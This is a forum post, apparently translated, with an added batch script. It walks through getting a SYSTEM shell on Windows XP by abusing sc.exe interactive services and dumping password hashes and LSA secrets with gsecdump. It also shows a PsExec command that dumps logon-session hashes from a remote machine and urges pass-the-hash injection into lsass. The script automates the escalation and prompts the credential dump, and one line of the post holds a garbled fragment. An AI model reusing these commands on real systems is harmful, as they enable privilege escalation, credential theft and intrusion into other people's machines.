To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS
C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]
options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
to get the hashes from active logon sessions of a remote system.
8 s, Q5 V" y, p- D7 HThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use the iam tool from the pshtools toolkit to inject the hashes just captured with gsecdump into the local lsass process, which gives you a hash-injection attack. The foreigners really are good at this; administrators are going to be kept busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, never actually need to have the password cracked at all; it is simply a matter of using the tools. As the original article puts it, whether the password is 4 characters or 127 characters long, once you have the hash you can get in 100% of the time.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
I had a look at the original source; it seems to be from /2007/03/16/. Frustrating; what a gap.
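The sc.exe sequence from the quoted post, as an added batch example (not code from the original blog post or from the gsecdump or PsExec tools): it runs the create / start / delete steps in one script and checks the expected error 1053 and the cleanup instead of leaving them to the eye. It assumes Windows XP/2003 (where an interactive service can still put a window on the console desktop), an administrator cmd.exe, and gsecdump.exe in the same directory as the script; the service name shellcmdline is the one used in the post, while SVC and TOOLDIR are variable names chosen here.

```batch
@echo off
REM Added example, not code from the original blog post or from the
REM gsecdump / PsExec tools. Assumptions: Windows XP/2003, an administrator
REM cmd.exe, gsecdump.exe next to this script (TOOLDIR). The service name
REM "shellcmdline" is the one used in the post.
setlocal
set SVC=shellcmdline
set TOOLDIR=%~dp0

REM 1. Register cmd.exe as an own-process, interactive service. "/K start"
REM    makes the service's cmd.exe spawn a second cmd window and keep running.
sc create %SVC% binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
if errorlevel 1 (
    echo [-] sc create failed. Run this from an administrator prompt.
    exit /b 1
)

REM 2. Start it. cmd.exe never reports back to the Service Control Manager,
REM    so StartService fails with 1053 after the SCM timeout; by then the
REM    spawned window, running as NT AUTHORITY\SYSTEM, is already on screen.
sc start %SVC% 2>&1 | find "1053" >nul
if errorlevel 1 (
    echo [!] Did not see the expected error 1053; check the SCM output above.
) else (
    echo [*] Error 1053 is expected: cmd.exe is not a real service, but the SYSTEM window was spawned.
)

REM 3. Remove the registration right away so no "cmd.exe as a service" entry
REM    is left behind. The spawned cmd.exe keeps running; the SCM marks the
REM    entry for deletion and drops it once that process has exited.
sc delete %SVC%

REM 4. Verify the cleanup. Querying a removed service fails with error 1060,
REM    ERROR_SERVICE_DOES_NOT_EXIST.
sc query %SVC% 2>&1 | find "1060" >nul
if errorlevel 1 (
    echo [!] Service %SVC% still exists, probably marked for deletion. Close the spawned window and retry sc delete.
) else (
    echo [+] Service %SVC% removed.
)

echo.
echo In the new window, confirm the context and dump the logon-session hashes:
echo     whoami
echo     "%TOOLDIR%gsecdump.exe" -u
endlocal
```

For a remote box the equivalent is the psexec -s line in the post, which runs gsecdump as SYSTEM without the service dance. The interactive-service trick itself is specific to the XP-era systems the post targets: from Windows Vista on, session 0 isolation keeps a service's window off the user's desktop, and Windows 10 version 1803 dropped support for interactive services altogether.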